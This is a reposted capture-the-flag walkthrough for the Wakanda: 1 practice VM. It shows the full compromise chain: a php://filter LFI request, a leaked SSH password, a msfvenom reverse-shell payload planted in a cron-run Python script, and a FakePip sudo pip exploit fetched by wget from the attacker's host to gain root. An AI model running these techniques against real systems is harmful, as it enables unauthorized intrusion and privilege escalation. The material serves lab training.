未加星标

Hack the Wakanda: 1 (CTF Challenge)

字体大小 | |
[开发(python) 所属分类 开发(python) | 发布者 店小二04 | 时间 2018 | 作者 红领巾 ] 0人收藏点击收藏

Hello friends! Today we are going to take another CTF challenge known as Wakanda and it is another capture the flag challenge provided for practice. So let’s try to break through it. But before please note that you can download it from here .

Security Level:Intermediate

Flags:There are three flags (flag1.txt, flag2.txt, root.txt)

Penetrating Methodologies

Network Scanning (Nmap, netdiscover) HTTP service enumeration Exploiting LFI usingphp filter Decode the base 64 encoded text for password SSH Login Get 1 st Flag Finding files owned by devops Overwrite antivirus.py via malicious python code Get netcat session Get 2 nd flag Sudo Privilege Escalation Exploit Fake Pip Get the Root access and Capture the 3rd flag

WalkThrough

Let’s start off with scanning the network to find our target.

netdiscover
Hack the Wakanda: 1 (CTF Challenge)

We found our target > 192.168.1.124

Our next step is to scan our target with NMAP.

nmap -p- -A 192.168.1.124
Hack the Wakanda: 1 (CTF Challenge)

The NMAP output shows us that there are 4 ports open: 80 (HTTP), 111 (RPC), 333(SSH), 48920(RPC)

Browsed the URL http://192.168.1.124 and poked around; however we were not able to get any significant clues to move forward


Hack the Wakanda: 1 (CTF Challenge)

We didn’t find anything on the webpage so we use dirb to enumerate the directories.

dirb http://192.168.1.124
Hack the Wakanda: 1 (CTF Challenge)

All the pages that we find in the dirb scan has size zero and we don’t find any content on any of the pages. We take a look at the source page of the index file and we find a “lang” parameter commented inside the page.


Hack the Wakanda: 1 (CTF Challenge)

We use the “lang” parameter, just like it was shown in the page and find the text has been converted into French. Now we check if the “lang” parameter is vulnerable to LFI.


Hack the Wakanda: 1 (CTF Challenge)

We are able to exploit the LFI vulnerability using “php://filter/convert.base64-encode” function and access the index page.

curl http://192.168.1.124/?lang=php://filter/convert.base64-encode/resource=index
Hack the Wakanda: 1 (CTF Challenge)

We decode the base64 encoded string and find the password “ Niamey4Ever227!!! ”. On the page we find that “ mamadou ” is the author. We use these credentials to login through ssh on the target machine.


Hack the Wakanda: 1 (CTF Challenge)

When we login through ssh we get a python IDE prompt. We import pty module, and spawn ‘/bin/bash’ shell. We take a look at home directory for user mamaduo and find the first flag.

ssh mamaduo@192.168.1.124 -p 3333
Hack the Wakanda: 1 (CTF Challenge)

Enumerating through the directories, inside /tmp directory we find a file called test. We open it and find nothing interesting, but when we take a closer look at the file we find it that is owned by a devops. Now we find all the files owned by user devops and find a file called “.antivirus.py” inside /srv directory.

find / -user devops 2>/dev/null
Hack the Wakanda: 1 (CTF Challenge)

Now when we open the python file we find that it is opening and test file and writing “test” inside it. To exploit this, we replace the code with shellcode. First we create a msfvenom payload.

msfvenom -p cmd/unix/reverse_python lhost=192.168.1.134 lport=4444 R
Hack the Wakanda: 1 (CTF Challenge)

After creating the payload, we open the “. antivirus.py” file and comment out the earlier code and insert our payload without adding “python -c”.


Hack the Wakanda: 1 (CTF Challenge)

We setup our listener using netcat, we wait for a few minutes for the script to get executed. As soon as the script is executed we get a reverse shell. When we check the UID we find that we spawned a shell for devops. Now we go to /home/devops directory and find the second flag. After getting the second flag we find that we can execute pip is super user without root.


Hack the Wakanda: 1 (CTF Challenge)

Now there is script called Fakepip (download here ), that can be used to exploit this vulnerability.


Hack the Wakanda: 1 (CTF Challenge)

We download the fakepip script into our system to edit the payload inside.

git clone https://github.com/0x00-0x00/FakePip.git

We edit the payload inside os.system function.


Hack the Wakanda: 1 (CTF Challenge)

We decode the base64 encoded string and change the IP address to our IP address. Then we again convert the string to base64 and replace the older string with the new one.


Hack the Wakanda: 1 (CTF Challenge)

We start the python server on our system, so that we can upload the FakePip script into the target machine.

python -m SimpleHTTPServer 80
Hack the Wakanda: 1 (CTF Challenge)

After we start HTTP server, we download the script on the target machine using wget. Now execute the command as per the instructions given to us on the FakePip readme file.

wget http://192.168.1.134/setup.py sudo pip install . --upgrade --force-install
Hack the Wakanda: 1 (CTF Challenge)

As soon as we run the command we get a reverse shell as root user. We now go to root directory and find the root flag.


Hack the Wakanda: 1 (CTF Challenge)

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

本文开发(python)相关术语:python基础教程 python多线程 web开发工程师 软件开发工程师 软件开发流程

tags: find,We,file,our,flag,python
分页:12
转载请注明
本文标题:Hack the Wakanda: 1 (CTF Challenge)
本站链接:https://www.codesec.net/view/586973.html


1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
技术大类 技术大类 | 开发(python) | 评论(0) | 阅读(119)